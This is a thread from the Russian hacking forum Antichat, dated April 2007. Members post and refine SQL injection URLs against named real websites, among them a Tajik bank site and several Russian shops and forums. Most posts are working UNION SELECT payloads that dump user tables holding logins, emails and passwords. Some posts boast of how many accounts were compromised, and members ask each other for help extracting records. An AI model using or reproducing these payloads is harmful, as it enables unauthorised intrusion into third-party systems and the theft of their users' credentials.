ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1871  
Старый 13.04.2007, 20:15
Аватар для *D1VER
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
Провел на форуме:
685950

Репутация: 175
Отправить сообщение для *D1VER с помощью ICQ
По умолчанию

http://www.fasie.ru/index.php?pid=-1+union+select+1,0x3c7363726970743e616c65727428272 a443156455227293c2f7363726970743e,3,4,5/*
http://www.newdramafest.ru/news.php?nid=-1+union+select+1,2,user(),444/*
http://www.dynamomania.com/news.php?p=message&id=-1+union+select+concat(email,char(58),id,char(58),p wd,char(58))+from+users/* Вывод в Титле! Пасы к форуму! Форум шляпный ((
http://www.informeco.ru/sud.php?stat=-1+union+select+1,2,table_name,4,5,6,7,8,9,10+from+ information_schema.tables/*

Последний раз редактировалось *D1VER; 13.04.2007 в 21:11..
 
Ответить с цитированием

  #1872  
Старый 13.04.2007, 21:29
Аватар для V.I.P
V.I.P
Познающий
Регистрация: 06.04.2007
Сообщений: 77
Провел на форуме:
1062869

Репутация: 136
Отправить сообщение для V.I.P с помощью ICQ
По умолчанию

http://www.fotocopy.ru/catalog/showcd.html?id=1339'
http://www.skripov.com/index.php?date=2007-02-15&page=12&item_id=157640'
http://www.infosystems.ru/TestCenter/order.asp?TestID=5839'
http://www.azs-snab.ru/answer_board.php?id=13977'
---------------------------------------------------
http://www.crdf.ru/?id=-20+order+by+9/*
---------------------------------------------------
http://archive.officemart.ru/news_print.htm?id=1417'+union+select+1,2,3,4,5+fro m+email/*
http://www.heartsunion.com/vopr-otv/index.php?id=-8+union+select+1,2,3,version(),4/*
 
Ответить с цитированием

  #1873  
Старый 13.04.2007, 21:38
Аватар для *D1VER
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
Провел на форуме:
685950

Репутация: 175
Отправить сообщение для *D1VER с помощью ICQ
По умолчанию

Цитата:
Сообщение от V.I.P  
http://www.fotocopy.ru/catalog/showcd.html?id=1339'
http://www.skripov.com/index.php?date=2007-02-15&page=12&item_id=157640'
http://www.infosystems.ru/TestCenter/order.asp?TestID=5839'
http://www.azs-snab.ru/answer_board.php?id=13977'
---------------------------------------------------
http://www.crdf.ru/?id=-20+order+by+9/*
---------------------------------------------------
http://archive.officemart.ru/news_print.htm?id=1417'+union+select+1,2,3,4,5+fro m+email/*
http://www.heartsunion.com/vopr-otv/index.php?id=-8+union+select+1,2,3,version(),4/*

Одна инъекциЯ
Цитата:
http://www.heartsunion.com/vopr-otv/index.php?id=-8+union+select+1,2,3,version(),4/*
Остальное Шняга какаято...
 
Ответить с цитированием

  #1874  
Старый 13.04.2007, 21:50
Аватар для -ter-
-ter-
Новичок
Регистрация: 23.08.2005
Сообщений: 4
Провел на форуме:
24236

Репутация: 0
Отправить сообщение для -ter- с помощью ICQ
По умолчанию

http://sibron.ru/index.php?option=com_content&id=0&Itemid=0&task=se ction
выдает ошибку:
Fatal error: Call to undefined method: mosempty->set() in /var/optpart/local/apache/http/sibron.ru/ht docs/components/com_content/content.php on line 197
но если поставить кавычку в конце - всё ок
в чем может быть дело?
движок mambo имхо > 4.5
посоветуйте что нить плз!

Последний раз редактировалось Koller; 14.04.2007 в 04:41..
 
Ответить с цитированием

  #1875  
Старый 13.04.2007, 22:00
Аватар для *D1VER
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
Провел на форуме:
685950

Репутация: 175
Отправить сообщение для *D1VER с помощью ICQ
По умолчанию

http://www.metalistfans.net/news.php?id=-1+union+select+1,2,3,4,name,6,7,8,9+from+forum/*
http://www.ezgulik.org/news.php?id=-197+union+select+1,2,version(),user(),5,6/*

Последний раз редактировалось *D1VER; 13.04.2007 в 22:10..
 
Ответить с цитированием

sql-inj
  #1876  
Старый 13.04.2007, 22:01
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql-inj

Сайт: http://flash-gorod.net/
уязвимость: http://flash-gorod.net/files.php?cat=4'
подобранные таблицы: users
подобранные поля: nick,password,icq,email,city,sex
767 организмов
Цитата:
http://flash-gorod.net/files.php?cat=-4%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,c oncat_ws(0x3a,id,nick,password,icq,email,city,sex) %20from%20users/*
 
Ответить с цитированием

  #1877  
Старый 13.04.2007, 22:22
Аватар для kair
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

попалась скуль в банке таджикистана =)
помогите вывести записи!!!
http://www.nbt.tj/?c=5&id=5%20union%20select%201,2,3,4,5,6,7,8,9/*
 
Ответить с цитированием

  #1878  
Старый 13.04.2007, 22:45
Аватар для V.I.P
V.I.P
Познающий
Регистрация: 06.04.2007
Сообщений: 77
Провел на форуме:
1062869

Репутация: 136
Отправить сообщение для V.I.P с помощью ICQ
По умолчанию

sorry глюканул чё та я.

http://www.akvilon.biz/index.php?content=products&prd_id=-48+union+select+1,2,3, 4/*
Таблицы:
CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, banners, categories, images, news, newspics, partners, prices, product_docs, products, sertificates
---------------------------
http://www.uprav.biz/show_action.php?action_id=14762'+union+select+1,2, 3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6, 7,8,9,10,1,2,3,4,5,6,7,8,9/* -слепая инж order49

Последний раз редактировалось Koller; 13.04.2007 в 23:39..
 
Ответить с цитированием

sql-inj
  #1879  
Старый 13.04.2007, 23:15
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql-inj

Сайт: http://inetoncd.ru/
уязвимость: http://inetoncd.ru/catalog_order.php?hash=211638&mom=76'
подобранные таблицы: clients
подобранные поля: id,login,password
3392 организма
Цитата:
http://inetoncd.ru/catalog_order.php?hash=211638&mom=-76%20union%20select%201,2,concat_ws(0x3a,id,login, password),4,5,6%20from%20mysql.clients/*
 
Ответить с цитированием

  #1880  
Старый 13.04.2007, 23:38
Аватар для }{0TT@БЬ)Ч
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

Цитата:
Сообщение от kair  
попалась скуль в банке таджикистана =)
помогите вывести записи!!!
http://www.nbt.tj/?c=5&id=5%20union%20select%201,2,3,4,5,6,7,8,9/*
Код:
http://www.nbt.tj/?c=44&id=44&a=-289+union+select+1,AES_DECRYPT(AES_ENCRYPT(database(),0x71),0x71),3,4,5/*
но таблиц чето не нашел
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ